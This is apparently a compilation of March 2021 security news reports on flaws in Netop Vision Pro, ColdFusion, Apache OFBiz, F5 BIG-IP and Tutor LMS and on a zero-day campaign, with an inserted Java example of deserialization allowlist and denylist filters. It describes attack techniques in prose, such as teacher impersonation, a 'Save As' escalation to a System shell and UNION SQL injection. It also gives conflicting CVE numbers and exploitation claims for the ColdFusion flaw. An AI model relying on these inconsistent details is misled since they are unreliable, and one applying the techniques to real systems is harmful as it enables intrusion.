Researchers also found, after the first UDP message was sent, any messages sent after that were Transmission Control Protocol (TCP), which allowed the teacher to keep the socket open for the rest of class.

Further evaluation revealed that three authentication codes, which the researchers called “tokens,” controlled access between student and teacher. Teachers and students were each issued a static, unique code. A third authentication “token” was also required, which their analysis revealed matched the “range of memory being allocated to the heap” digit within the code, making it predictable and exploitable by attackers.

From there, researchers had what they needed to create their own teacher workstation, meaning an “attacker could emulate a teacher and execute arbitrary commands,” the report explained. Attackers armed with teacher access would be able to launch applications on the student machines and more, said researchers.

Privileges & Permissions Bugs
The researchers also found privileges weren’t being dropped – meaning they were determined when the software was installed, but weren’t checked by a “ShellExecute” path after that.

“We found four cases where the privileges were not reduced, however none of them were accessible over the network,” the researchers said. “Regardless, they still could potentially be useful, so we investigated each.” This bug was referenced as “CWE-269: Incorrect Privilege Assignment.”

The first was when users opened Internet Explorer with a prefilled URL and the remaining three related to plugins that bypassed file filters within “Save As,” “Screen Shot Viewer,” and the About page’s “System Information” windows.

“We used an old technique which uses the ‘Save as’ button to navigate to the folder where cmd.exe is located and execute it,” the researchers explained. “The resulting CMD process inherits the System privileges of the parent process, giving the user a System-level shell.”

The team was able to use this attack to “screen blank students,” restart the Netop application, block internet access and more.

Hijacking the Chat Function
Finally, researchers were able to hijack the Chat function to send text or files to student computers, due to a bug (“CWE-276: Incorrect Default Permissions”) that scored 9.5 (out of 10) on the CVSS score, “the highest of the bunch,” according to the report.

“Delving deeper into the functionality of the chat application, we found that the teacher also has the ability to read files in the student’s ‘work directory’ and delete files within it,” the report said. “Due to our findings demonstrated with CVE-2021-27195, we can leverage our emulation code as an attacker to write, read, and delete files within this ‘work directory’ from a remote attack vector on the same local network.”

The application is always running and makes the assumption every device on the network could be a teacher and lets everyone else know where they are, making the system easy for threat actors to hijack for any number of purposes, the researchers explained.

“An attacker doesn’t have to compromise the school network; all they need is to find any network where this software is accessible, such as a library, coffee shop, or home network,” the report said. “It doesn’t matter where one of these student’s PCs gets compromised as a well-designed malware could lay dormant and scan each network the infected PC connects to, until it finds other vulnerable instances of Netop Vision Pro to further propagate the infection.”

Cyberattacks Rampant on Education Sector
As service providers across industries are faced with the reality that security needs to be one of the primary drivers behind their business, the need to have a system in place to respond and communicate with ethical security researchers and then make appropriate fixes is becoming exponentially more crucial. Specifically, education is being targeted for attack, according to a December statement released by the FBI and the Cybersecurity and Infrastructure Security Agency (CISA), most notably by ransomware. The CISA and FBI report said that reported ransomware incidents against K-12 schools made up 57 percent of all those reported between last August and September.

“Entire industries moved from physical to digital operations in 2020 and education was no exception,” Yaniv Bar-Dayan, CEO at Vulcan Cyber, told Threatpost. “School districts took a hard pivot on their approach to instructor-led learning as well as the security of teachers and students. With teachers using more software than ever, and software the most vulnerable it has ever been, IT security teams are playing a game of vulnerability whack-a-mole to deliver a secure online learning experience. This isn’t easy without the ability to prioritize, orchestrate, automate and measure remediation campaigns and outcomes.”

Just last month, the FBI sent a follow-up “Flash” alert to the security community that ransomware PYSA is pummeling the education sector, including higher education, K-12 education and seminaries.

The Netop Response
For its part, Netop has applied fixes to everything reported by McAfee, except the network encryption bit, which is in the works.

“The network traffic is still unencrypted, including the screenshots of the student computers but Netop has assured us it is working on implementing encryption on all network traffic for a future update,” researchers said.

That said, researchers praised Netop’s quick response time to the initial security report: “We’d like to recognize Netop’s outstanding response and rapid development and release of a more secure software version and encourage industry vendors to take note of this as a standard for responding to responsible disclosures from industry researchers,” they said.


Adobe Fixes Critical ColdFusion Flaw in Emergency Update

23.3.2021 Vulnerebility  Threatpost

Attackers can leverage the critical Adobe ColdFusion flaw to launch arbitrary code execution attacks.

In an unscheduled security update, Adobe is warning of a critical security flaw in its ColdFusion platform, used for building web applications.

The security alert comes two weeks after Adobe’s regularly-scheduled updates. During these updates, the tech company issued patches for a slew of critical security vulnerabilities, which, if exploited, could allow for arbitrary code execution on vulnerable Windows systems.

The latest flaw (CVE-2021-21087) exists in ColdFusion versions 2016 (Update 16 and earlier), 2018 (Update 10 and earlier) and 2021 (Version 2021.0.0.323925), and could lead to arbitrary code execution.

“Adobe is not aware of any exploits in the wild for any of the issues addressed in these updates,” according to Adobe on Monday.

The vulnerability stems from improper input validation, which is a type of issue (previously plaguing other Adobe products) that occurs when the affected product does not validate input. This can affect the control flow or data flow of a program, and allow for an attacker to launch a slew of malicious attacks. Further information on the flaw – including where in ColdFusion it exists, and how difficult it is to exploit, were not addressed; Threatpost has reached out to Adobe for further comment.

The flaw has been corrected in the following versions of ColdFusion: ColdFusion 2016 (update 17), ColdFusion 2018 (update 11) and ColdFusion 2021 (update 1). See below for the updated versions.

[Image: table of updated ColdFusion versions. Source: Adobe]

Adobe said the security update is a “priority 2,” meaning that it resolves vulnerabilities “in a product that has historically been at elevated risk” – but for which there are currently no known exploits.

“Based on previous experience, we do not anticipate exploits are imminent,” for “priority 2” updates, said Adobe. However, “as a best practice, Adobe recommends administrators install the update soon (for example, within 30 days).”

Adobe credited Josh Lane with discovering and reporting the flaw.

ColdFusion, a web-programming language providing a platform for building and deploying web and mobile applications, has previously been privy to various security flaws.

In April, Adobe released patches for “important”-severity vulnerabilities in ColdFusion, which if exploited, could enable attackers to view sensitive data, gain escalated privileges, and launch denial-of-service attacks. And in 2019, Adobe issued unscheduled security updates to fix two critical flaws in its ColdFusion product. The critical vulnerabilities could have enabled an attacker to either execute arbitrary code or bypass access control on impacted systems.


Adobe addresses a critical vulnerability in ColdFusion product
23.3.2021
Vulnerebility  Securityaffairs

Adobe has released security updates to address a critical vulnerability in the ColdFusion product (versions 2021, 2016, and 2018) that could lead to arbitrary code execution. 
Adobe has released security patches to address a critical vulnerability in Adobe ColdFusion that could be exploited by attackers to execute arbitrary code on vulnerable systems. The issue, tracked as CVE-2021-21087 is caused by improper input validation.

“Adobe has released security updates for ColdFusion versions 2021, 2016 and 2018. These updates resolve a critical  vulnerability that could lead to arbitrary code execution. ” reads the advisory published by the software giant.

The flaw affects ColdFusion 2016 Update 16 and earlier versions, ColdFusion 2018 Update 10 and earlier versions, and ColdFusion 2021 version 2021.0.0.323925.

Adobe recommends updating your ColdFusion JDK/JRE to the latest version of the LTS releases for 1.8 and JDK 11, and it pointed out that installing the ColdFusion update without a corresponding JDK update will NOT secure the server.

The software giant also recommends customers apply the security configuration settings as outlined on the ColdFusion Security page as well as review the respective Lockdown guides:

ColdFusion 2018 Auto-Lockdown guide
ColdFusion 2016 Lockdown Guide
ColdFusion 2021 Lockdown Guide

The vulnerability was reported by Josh Lane. The company confirmed that it is now aware of attacks in the wild exploiting the CVE-2021-20187 vulnerability.


Abusing distance learning software to hack into student PCs
23.3.2021
Vulnerebility  Securityaffairs

Experts uncovered critical flaws in the Netop Vision Pro distance learning software used by many schools to control remote learning sessions.
McAfee discovered multiple security vulnerabilities in the popular Netop Vision Pro distance learning software, which is used by several teachers to control remote learning sessions.

The distance learning software implements multiple features, including viewing student screens, chat functions, and freezing student screens.

McAfee’s Advanced Threat Research (ATR) team has discovered four vulnerabilities, tracked CVE-2021-27192, CVE-2021-27193, CVE-2021-27194, and CVE-2021-27195, that could be exploited by attackers for multiple malicious purposes, including taking over students’ computers.

“Our research into this software led to the discovery of four previously unreported critical issues, identified by CVE-2021-27192, CVE-2021-27193, CVE-2021-27194 and CVE-2021-27195. These findings allow for elevation of privileges and ultimately remote code execution, which could be used by a malicious attacker, within the same network, to gain full control over students’ computers.” reads the post published by McAfee.

To test the software, experts set up the Netop software in a normal configuration and environment on four virtual machines on a local network. The test environment was composed of three systems configured as students and only one as a teacher.

The first issue that emerged is that all network traffic was unencrypted and there was no option to turn it on. Experts also noticed that when students connect to the classroom they would unknowingly begin sending screenshots to the teacher.

Experts were also able to eavesdrop and modify traffic generated when a teacher starts a session. The researchers were able to modify the data to masquerade as the teacher host, perform local elevation of privilege (LPE) and achieve System privileges.

Reversing the MChat network traffic and analyzing the Chat features experts discovered that it was possible to overwrite a file and execute it with System privileges.

“With the successful MChat handshake complete we needed to send a packet that would change the “work directory” to that of our choosing. Figure 21 shows the packet as a Scapy layer used to change the work directory on the student’s PC.” continues the report. “The Netop plugin directory was a perfect target directory to change to since anything executed from this directory would be executed as System.”

Experts also discovered that Netop Vision Pro student profiles broadcast their presence on the network every few seconds. This mechanism was implemented so that students can find teachers on every connected network, but it opens the door to an attack on an entire school system.

Experts pointed out that attackers could chain these issues to get remote code execution with System privileges from any device on the local network.

“The largest impact being remote code execution of arbitrary code with System privileges from any device on the local network. This scenario has the potential to be wormable, meaning that the arbitrary binary that we run could be designed to seek out other devices and further the spread.” concludes the report. “In addition, if the “Open Enrollment” option for a classroom is configured, the Netop Vision Pro student client broadcasts its presence on the network every few seconds.”

The experts privately disclosed the flaws to the vendor on December 11, some of which were addressed with the release of the software version 9.7.2. Addressed flaws are the LPE issues and the encryption of credentials.


RCE flaw in Apache OFBiz could allow to take over the ERP system
23.3.2021
Vulnerebility  Securityaffairs

The Apache Software Foundation fixed a high severity remote code execution flaw in Apache OFBiz that could have allowed attackers to take over the ERP system.
The Apache Software Foundation addressed last week a high severity vulnerability in Apache OFBiz, tracked as CVE-2021-26295, that could have allowed a remote, unauthenticated attacker to take over the ERP system.

Unsafe deserialization occurs when malformed or unexpected data can be used to abuse application logic, deny service, or execute arbitrary code when deserialized. This category of issue can compromise availability and the authorization process, and bypass access control.

Apache OFBiz is an open-source enterprise resource planning (ERP) system that provides a suite of enterprise applications that integrate and automate many of the business processes of an enterprise.

The issue is an unsafe deserialization that affects versions prior to 17.12.06. It could allow unauthorized remote attackers to execute arbitrary code on the server and potentially take over the open-source ERP system.

“Apache OFBiz has unsafe deserialization prior to 17.12.06. An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz.” wrote Jacques Le Roux.

The flaw was reported by r00t4dm at Cloud-Penetrating Arrow Lab, MagicZero from SGLAB of Legendsec at Qi’anxin Group, and Longofo at Knownsec 404 Team.

Admins have to upgrade their OFBiz install to the latest version (17.12.06) as soon as possible.


Remote Code Execution Vulnerability Patched in Apache OFBiz
23.3.2021
Vulnerebility  Securityweek

One of the vulnerabilities addressed by the latest update for Apache OFBiz is an unsafe Java deserialization issue that could be exploited to execute code remotely, without authentication.

A Java-based web framework, Apache OFBiz is an open source enterprise resource planning (ERP) system that includes a suite of applications to automate business processes within enterprise environments, and which can be used across any industry.

OFBiz is one of the platforms that was affected by a Java serialization vulnerability identified and reported in 2015, and which impacted the Apache Commons Collections and Apache Groovy libraries that OFBiz relies on.

While patches were released for both libraries, the risks associated with the use of RMI, JNDI, JMX, or Spring – and possibly other Java classes – were not eliminated. The later implementation of a whitelist was meant to add further protection against possible Java serialization vulnerabilities.

After addressing an issue (CVE-2019-0189) with the ObjectInputStream class, where users needed to add their own objects/classes to the list of objects used by OFBiz OOTB (Out Of The Box), Apache also implemented the option to deny objects.

Apache OFBiz 17.12.06, the sixth and final release of the 17.12 series, includes a patch for CVE-2021-26295, adding a “blacklist (to be renamed soon to denylist) in Java serialization.”

Tracked as OFBIZ-12167, the commit that addresses the security issue “adds an example based on RMI which is known to be a problem,” OFBiz expert developer Jacques Le Roux says.

The unsafe deserialization, he explains, could be exploited to execute code remotely, essentially allowing an unauthenticated attacker to successfully take over Apache OFBiz. Updating OFBiz to the 17.12.06 package should prevent possible exploitation attempts.


Adobe Patches Critical ColdFusion Security Flaw
23.3.2021
Vulnerebility  Securityweek

Adobe has released an urgent patch for a potentially dangerous security vulnerability in Adobe ColdFusion, the platform used for building and deploying mobile and web apps.

“These updates resolve a critical vulnerability that could lead to arbitrary code execution,” Adobe said in an advisory issued on Monday.

The security updates are available for ColdFusion versions 2021 (including version 2021.0.0.323925), 2016 and 2018.

Adobe said it has not observed signs of in-the-wild exploitation targeting the new CVE-2021-20187 vulnerability.

According to Adobe’s advisory, the vulnerability is described as “improper input validation” that could lead to arbitrary remote code execution.

The company recommends that users update the ColdFusion JDK/JRE to the latest version of the LTS releases for 1.8 and JDK 11. “Applying the ColdFusion update without a corresponding JDK update will NOT secure the server,” Adobe warned.

The company also published security configuration settings and lockdown guides for ColdFusion deployments.


Popular Netop Remote Learning Software Found Vulnerable to Hacking
23.3.2021
Vulnerebility  Thehackernews

Cybersecurity researchers on Sunday disclosed multiple critical vulnerabilities in remote student monitoring software Netop Vision Pro that a malicious attacker could abuse to execute arbitrary code and take over Windows computers.

"These findings allow for elevation of privileges and ultimately remote code execution which could be used by a malicious attacker within the same network to gain full control over students' computers," the McAfee Labs Advanced Threat Research team said in an analysis.

The vulnerabilities, tracked as CVE-2021-27192, CVE-2021-27193, CVE-2021-27194, and CVE-2021-27195, were reported to Netop on December 11, 2020, after which the Denmark-based company fixed the issues in an update (version 9.7.2) released on February 25.

"Version 9.7.2 of Vision and Vision Pro is a maintenance release that addresses several vulnerabilities, such as escalating local privileges, sending sensitive information in plain text," the company stated in its release notes.

Netop counts half of the Fortune 100 companies among its customers and connects more than 3 million teachers and students with its software. Netop Vision Pro allows teachers to remotely perform tasks on students' computers, such as monitoring and managing their screens in real time, restricting access to a list of allowed Web sites, launching applications, and even redirecting students' attention when they are distracted.

During the course of McAfee's investigation, several design flaws were uncovered, including:

CVE-2021-27194 - All network traffic between teacher and student is sent unencrypted and in clear text (e.g., Windows credentials and screenshots) without the ability to enable this during setup. In addition, screen captures are sent to the teacher as soon as they connect to a classroom to allow real-time monitoring.
CVE-2021-27195 - An attacker can monitor unencrypted traffic to impersonate a teacher and execute attack code on student machines by modifying the packet that contains the exact application to be executed, such as injecting additional PowerShell scripts.
CVE-2021-27192 - A "Technical Support" button in Netop's "about" menu can be exploited to gain privilege escalation as a "system" user and execute arbitrary commands, restart Netop, and shut down the computer.
CVE-2021-27193 - A privilege flaw in Netop's chat plugin could be exploited to read and write arbitrary files in a "working directory" that is used as a drop location for all files sent by the instructor. Worse, this directory location can be changed remotely to overwrite any file on the remote PC, including system executables.

CVE-2021-27193 is also rated 9.5 out of a maximum of 10 in the CVSS rating system, making it a critical vulnerability.

Needless to say, the consequences of such exploitation could be devastating. They range from the deployment of ransomware to the installation of keylogging software to the chaining of CVE-2021-27195 and CVE-2021-27193 to keep an eye on the webcams of individual computers running the software, McAfee warned.


While most of the vulnerabilities have been fixed, the fixes put in place by Netop still don't address the lack of network encryption, which is expected to be implemented in a future update.

"An attacker doesn't have to compromise the school network; all they need is to find any network where this software is accessible, such as a library, coffee shop or home network," said researchers Sam Quinn and Douglas McKee. "It doesn't matter where one of these student's PCs gets compromised, as a well-designed malware could lay dormant and scan each network the infected PC connects to until it finds other vulnerable instances of Netop Vision Pro to further propagate the infection."

"Once these machines have been compromised, the remote attacker has full control of the system since they inherit the System privileges. Nothing at this point, could stop an attacker running as 'system' from accessing any files, terminating any process, or reaping havoc on the compromised machine," they added.

The findings come at a time when the US Federal Bureau of Investigation (FBI) warned last week of an increase in PYSA (aka Mespinoza) ransomware attacks targeting educational institutions in 12 US states and the UK.

We have asked Netop for more details on the security updates and will update this article as soon as we receive a response.


Critical RCE Vulnerability Found in Apache OFBiz ERP Software—Patch Now
23.3.2021
Vulnerebility  Thehackernews

The Apache Software Foundation on Friday addressed a high severity vulnerability in Apache OFBiz that could have allowed an unauthenticated adversary to remotely seize control of the open-source enterprise resource planning (ERP) system.

Tracked as CVE-2021-26295, the flaw affects all versions of the software prior to 17.12.06 and employs an "unsafe deserialization" as an attack vector to permit unauthorized remote attackers to execute arbitrary code on a server directly.

OFBiz is a Java-based web framework for automating enterprise processes and offers a wide range of functionality, including accounting, customer relationship management, manufacturing operations management, order management, supply chain fulfillment, and warehouse management system, among others.

Specifically, by exploiting this flaw, a malicious party can tamper with serialized data to insert arbitrary code that, when deserialized, can potentially result in remote code execution.

"An unauthenticated attacker can use this vulnerability to successfully take over Apache OFBiz," OFBiz developer Jacques Le Roux noted.

Unsafe deserialization has been a source of data integrity and other security issues, with the Open Web Application Security Project (OWASP) noting that "data which is untrusted cannot be trusted to be well formed, [and that] malformed data or unexpected data could be used to abuse application logic, deny service, or execute arbitrary code, when deserialized."

r00t4dm at Cloud-Penetrating Arrow Lab, MagicZero from SGLAB of Legendsec at Qi'anxin Group, and Longofo at Knownsec 404 Team have been credited with reporting the vulnerability.

It's recommended to upgrade Apache OFBiz to the latest version (17.12.06) to mitigate the risk associated with the flaw.
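The three OFBiz articles describe the mitigation as a whitelist (allowlist) of classes permitted in Java serialization, later supplemented by a blacklist (denylist). The added example below is not OFBiz code: it shows the standard-library mechanism for exactly that, JEP 290 ObjectInputFilter (Java 9+), with an allowlist filter beside a denylist-only filter, and demonstrates why the allowlist is the stronger of the two. The class, field names and the sample payloads are hypothetical and constructed for the demo.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InvalidClassException;
import java.io.ObjectInputFilter;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.io.Serializable;

/**
 * Added example (not OFBiz's own code) of JEP 290 serialization filters.
 * Names below are hypothetical; the payloads are constructed for the demo.
 */
public class DeserializationFilterDemo {

    /** The one payload type this hypothetical endpoint expects to receive. */
    public static final class OrderSummary implements Serializable {
        private static final long serialVersionUID = 1L;
        final String orderId;
        final int items;
        OrderSummary(String orderId, int items) { this.orderId = orderId; this.items = items; }
    }

    /**
     * Allowlist filter: permit only the expected payload type (binary name of
     * the nested class) and java.lang.String; "!*" rejects every other class,
     * so RMI, JNDI or gadget-chain classes never reach resolveClass(). The
     * maxdepth/maxarray limits also bound resource use while parsing the stream.
     */
    static final ObjectInputFilter ALLOWLIST = ObjectInputFilter.Config.createFilter(
        "DeserializationFilterDemo$OrderSummary;java.lang.String;maxdepth=5;maxarray=1000;!*");

    /**
     * Denylist-only filter (the "blacklist" approach the articles mention):
     * blocks some known-dangerous package trees but leaves everything not
     * listed UNDECIDED, which ObjectInputStream treats as allowed.
     */
    static final ObjectInputFilter DENYLIST = ObjectInputFilter.Config.createFilter(
        "!java.rmi.**;!javax.naming.**;!javax.management.**;!sun.rmi.**");

    /** Serialize an object into a byte array (stands in for a request body). */
    static byte[] serialize(Object o) throws IOException {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(o);
        }
        return bos.toByteArray();
    }

    /**
     * Deserialize under the given filter. A REJECTED verdict surfaces as an
     * InvalidClassException before any constructor or readObject() of the
     * rejected class runs; we return null in that case so callers can log it.
     */
    static Object deserialize(byte[] data, ObjectInputFilter filter) throws IOException {
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data))) {
            ois.setObjectInputFilter(filter);
            return ois.readObject();
        } catch (InvalidClassException rejected) {
            return null;
        } catch (ClassNotFoundException e) {
            throw new IOException(e);
        }
    }

    public static void main(String[] args) throws IOException {
        // Expected input: accepted by both filters.
        byte[] expected = serialize(new OrderSummary("A-1001", 3));
        System.out.println("allowlist accepts OrderSummary: " + (deserialize(expected, ALLOWLIST) != null));
        System.out.println("denylist accepts OrderSummary:  " + (deserialize(expected, DENYLIST) != null));

        // Unexpected input (a benign HashMap standing in for an unlisted class):
        // the allowlist rejects it, the denylist lets it through untouched.
        byte[] unexpected = serialize(new java.util.HashMap<String, String>());
        System.out.println("allowlist rejects HashMap:      " + (deserialize(unexpected, ALLOWLIST) == null));
        System.out.println("denylist lets HashMap through:  " + (deserialize(unexpected, DENYLIST) != null));
    }
}
```

A process-wide default can be set the same way with the jdk.serialFilter system property, so the allowlist applies to every ObjectInputStream the application creates, not only the ones where setObjectInputFilter is called explicitly.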


A threat actor exploited 11 zero-day flaws in 2020 campaigns
21.3.2021
Vulnerebility  Securityaffairs

A hacking group has employed at least 11 zero-day flaws as part of an operation that took place in 2020 and targeted Android, iOS, and Windows users.
Google’s Project Zero security team published a report about the activity of a mysterious hacking group that operated over the course of 2020 and exploited at least 11 zero-day vulnerabilities in its attacks on Android, iOS, and Windows users.

Google researchers observed two separate waves of attacks that took place in February and October 2020, respectively. Threat actors set up malicious sites in a series of watering hole attacks that were redirecting visitors to exploit servers hosting exploit chains for Android, Windows, and iOS devices.

“In October 2020, Google Project Zero discovered seven 0-day exploits being actively used in-the-wild. These exploits were delivered via “watering hole” attacks in a handful of websites pointing to two exploit servers that hosted exploit chains for Android, Windows, and iOS devices.” wrote the popular Project Zero researcher Maddie Stone. “These attacks appear to be the next iteration of the campaign discovered in February 2020 and documented in this blog post series.”

Since February 2020, the same hacking group has set up at least a couple dozen websites for its attacks. Experts noticed that the threat actors relied on both zero-day vulnerabilities and known flaws.

Nonetheless, the threat actor behind the attacks also showed the ability to replace zero-days on the fly once one was detected and patched by software vendors.

Below are the exploits that were delivered, by device and browser, in the last wave of attacks:

Exploit Server | Platform | Browser | Renderer RCE | Sandbox Escape | Local Privilege Escalation
1 | iOS | Safari | Stack R/W via Type 1 Fonts (CVE-2020-27930) | Not needed | Info leak via mach message trailers (CVE-2020-27950); Type confusion with turnstiles (CVE-2020-27932)
1 | Windows | Chrome | Freetype heap buffer overflow (CVE-2020-15999) | Not needed | cng.sys heap buffer overflow (CVE-2020-17087)
1 | Android** | Chrome | V8 type confusion in TurboFan (CVE-2020-16009) | Unknown | Unknown
2 | Android | Chrome | Freetype heap buffer overflow (CVE-2020-15999) | Chrome for Android heap buffer overflow (CVE-2020-16010) | Unknown
2 | Android | Samsung Browser | Freetype heap buffer overflow (CVE-2020-15999) | Chromium n-day | Unknown

** Note: this exploit was only delivered after exploit server #2 went down and CVE-2020-15999 was patched.

Below is the list of zero-day flaws exploited in the February 2020 campaign:

CVE-2020-6418 – Chrome Vulnerability in TurboFan
CVE-2020-0938 – Font Vulnerability on Windows
CVE-2020-1020 – Font Vulnerability on Windows
CVE-2020-1027 – Windows CSRSS Vulnerability

The zero-day flaws exploited in the October 2020 attacks are:

CVE-2020-15999 – Chrome Freetype heap buffer overflow
CVE-2020-17087 – Windows heap buffer overflow in cng.sys
CVE-2020-16009 – Chrome type confusion in TurboFan map deprecation
CVE-2020-16010 – Chrome for Android heap buffer overflow
CVE-2020-27930 – Safari arbitrary stack read/write via Type 1 fonts
CVE-2020-27950 – iOS XNU kernel memory disclosure in mach message trailers
CVE-2020-27932 – iOS kernel type confusion with turnstiles
At the time of this writing, Google has yet to attribute these campaigns to any specific threat actor and it is still unclear if the attacks have been conducted by a nation-state actor.

“The vulnerabilities cover a fairly broad spectrum of issues – from a modern JIT vulnerability to a large cache of font bugs. Overall each of the exploits themselves showed an expert understanding of exploit development and the vulnerability being exploited. In the case of the Chrome Freetype 0-day, the exploitation method was novel to Project Zero.” concludes the post. “Project Zero closed out 2020 with lots of long days analyzing lots of 0-day exploit chains and seven 0-day exploits. When combined with their earlier 2020 operation, the actor used at least 11 0-days in less than a year.”


Critical F5 BIG-IP Flaw Now Under Active Attack

20.3.2021 Vulnerebility  Threatpost

Researchers are reporting mass scanning for – and in-the-wild exploitation of – a critical-severity flaw in the F5 BIG-IP and BIG-IQ enterprise networking infrastructure.

Attackers are exploiting a recently-patched, critical vulnerability in F5 devices that have not yet been updated.

The unauthenticated remote command execution flaw (CVE-2021-22986) exists in the F5 BIG-IP and BIG-IQ enterprise networking infrastructure, and could allow attackers to take full control over a vulnerable system.

Earlier in March, F5 issued a patch for the flaw, which has a CVSS rating of 9.8 and exists in the iControl REST interface. After the patch was issued, several researchers posted proof-of-concept (PoC) exploit code after reverse engineering the Java software patch in BIG-IP.

Fast forward to this week, researchers reported mass scanning for – and in-the-wild exploitation of – the flaw.

“Starting this week and especially in the last 24 hours (March 18th, 2021) we have observed multiple exploitation attempts against our honeypot infrastructure,” said researchers with the NCC Group on Thursday. “This knowledge, combined with having reproduced the full exploit-chain we assess that a public exploit is likely to be available in the public domain soon.”

CISA, Researchers Urge Updating
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has urged companies using BIG-IP and BIG-IQ to fix the critical F5 flaw, along with another bug tracked as CVE-2021-22987. This flaw, with a CVSS rating of 9.9, affects the Traffic Management User Interface (TMUI), also referred to as the Configuration utility. When the device is running in Appliance mode, the TMUI has an authenticated RCE vulnerability in undisclosed pages.

The scenario is particularly urgent as F5 provides enterprise networking to some of the largest tech companies in the world, including Facebook, Microsoft and Oracle, as well as to a trove of Fortune 500 companies, including some of the world’s biggest financial institutions and ISPs.

“The F5 BIG-IP is a very juicy target due to the fact that it can handle highly sensitive data,” said Craig Young, principal security researcher at Tripwire in an email. “An attacker with full control over a load balancing appliance can also take control over the web applications served through it.”

It’s not clear who is behind the exploitations; Threatpost has reached out to NCC Group for further comment.

Other Active Exploits of F5 Flaws
Security experts in July 2020 urged companies to deploy an urgent patch for a critical vulnerability in F5 Networks’ networking devices, which was being actively exploited by attackers to scrape credentials, launch malware and more. The critical remote code-execution flaw (CVE-2020-5902) had a CVSS score of 10 out of 10.

And in September 2020, the U.S. government warned that Chinese threat actors had successfully compromised several government and private-sector entities by exploiting vulnerabilities in F5 BIG-IP devices (as well as Citrix and Pulse Secure VPNs and Microsoft Exchange servers).

For this latest rash of exploit attempts, anyone running an affected version of BIG-IP should prioritize upgrade, said Young.

“Any organization running BIG-IP or other network appliance with the management access exposed to the Internet should be re-evaluating their network layout and bringing those assets onto private networks,” he said.


Threat actors are attempting to exploit CVE-2021-22986 in F5 BIG-IP devices in the wild
20.3.2021
Vulnerebility  Securityaffairs

Cybersecurity experts warn of ongoing attacks aimed at exploiting a recently patched critical vulnerability in F5 BIG-IP and BIG-IQ networking devices.
Researchers at NCC Group and Bad Packets this week detected a wave of attacks exploiting a recently patched critical vulnerability, tracked as CVE-2021-22986, in F5 BIG-IP and BIG-IQ networking devices.

“After seeing lots of broken exploits and failed attempts, we are now seeing successful in the wild exploitation of this vulnerability, as of this morning” said Rich Warren, red team expert at NCC Group.
In early March, F5 released security updates for seven vulnerabilities in BIG-IP products: four rated critical, two rated high and one rated medium severity.

CVE-2021-22986 is an unauthenticated remote command execution vulnerability that resides in the iControl REST interface. The flaw received a CVSS score of 9.8 and affects BIG-IP and BIG-IQ.


The vulnerability could be exploited by unauthenticated attackers with network access to the iControl REST interface, through the BIG-IP management interface and self IP addresses, to execute arbitrary system commands, create or delete files, and disable services.

“We strongly encourage all customers to update their BIG-IP and BIG-IQ systems to a fixed version as soon as possible.” reads the advisory published by F5.

The attacks started shortly after security researchers released proof-of-concept exploit code for the vulnerability.

NCC Group released indicators of compromise for these attacks, along with detection logic and Suricata network rules.

“In the week that followed, several researchers posted proof-of-concept code after reverse engineering the Java software patch in BIG-IP.” reads the post published by NCC Group.
“Starting this week and especially in the last 24 hours (March 18th, 2021) we have observed multiple exploitation attempts against our honeypot infrastructure. This knowledge, combined with having reproduced the full exploit-chain we assess that a public exploit is likely to be available in the public domain soon.”

Update:

Researchers at Palo Alto Networks are also observing a Mirai variant attempting to exploit CVE-2021-22986 and CVE-2020-28188.



Tutor LMS for WordPress Open to Info-Stealing Security Holes

19.3.2021 Vulnerebility  Threatpost
The popular learning-management system for teacher-student communication is rife with SQL-injection vulnerabilities.

Security vulnerabilities in Tutor LMS, a WordPress plugin installed on more than 20,000 sites, open the door to information theft and privilege escalation, according to researchers.

Tutor LMS is a learning-management system for educators that allows them to digitally reach their students. It supports course-building, student forums, multimedia classes and more. According to an analysis from Wordfence, there are five SQL-injection flaws in the plugin (rated medium severity), and at least one high-severity bug stemming from unprotected AJAX endpoints.

The former “make it possible for attackers to obtain information stored in a site’s database, including user credentials, site options and other sensitive information,” researchers explained, in a posting this week.

The remaining flaws allow authenticated attackers to elevate user privileges and alter course content and settings, through the use of various AJAX actions.

Site administrators should update to the patched version, Tutor LMS v.1.8.3.

Medium-Severity SQL-Injection Bugs
The five SQL-injection vulnerabilities all rate 6.5 out of 10 on the CVSS vulnerability-rating scale, making them medium in severity. CVEs are pending for all.

The first SQL-injection issue exists in a review feature in Tutor LMS that allows students to rate their courses.


To enter a rating, the plugin uses an AJAX action to process the request, according to Wordfence. If a review already exists for the current user and course, it will update the rating – if it’s new, it will create a new review and rating and add it to the database.

“By using get_var() without the use of prepare() when checking for the existence of a review, along with no SQL sanitization on the user-supplied variables, a user could inject arbitrary SQL statements while leaving a review,” researchers explained, adding that a user would need to be authenticated to carry out an attack (though creating a student profile can be easy).

The injected arbitrary SQL statements could open the door to snatching information from the site’s database, including login details for users.

“In some cases, where a MySQL server is insecurely configured, this could allow an attacker to read files and create new files containing web shells along with modifying information in the database,” researchers added.

Another SQL-injection issue was found in the ability for teachers to mark answers as correct once they have been submitted by a student.

In this case, the plugin uses an AJAX action to retrieve the initial student answer recorded in the database, while using the user-supplied value from the POST parameter answer_id as the answer ID.


“Unfortunately, there was no SQL sanitization on the user-supplied value, nor was the function using a prepared statement, making it possible for SQL queries to be injected,” according to Wordfence.

Researchers added, “This functionality was intended to be used by teachers and administrators only, however, since it was an AJAX action with no nonce protection or capability checks in place, this meant that any authenticated user, including students, had the ability to execute this action and exploit the SQL injection vulnerability.”

The team also found three UNION-based SQL-injection vulnerabilities. This type of weakness occurs when attacker-supplied input lets a second SELECT be appended to the application’s own query with the UNION operator, so that the results of both queries are returned together. The appended SELECT must return the same number of columns as the original one, but with that constraint met an attacker can read arbitrary tables straight out of the normal response.

“This differs from the previous two SQL-injection types discussed because data can easily be extracted by simply adding an additional query to the already existing query, through the use of the UNION operator,” researchers explained. “This is one of the simplest, and easiest, forms of SQL-injection vulnerability that can be exploited.”

UNION-Based SQL Bugs
The first of these vulnerabilities exists in the Tutor LMS feature that allows teachers to retrieve a set of answers for a given question, while analyzing the response of students.

In order to provide this functionality, the plugin uses “get_results()” to obtain the answers from the database.

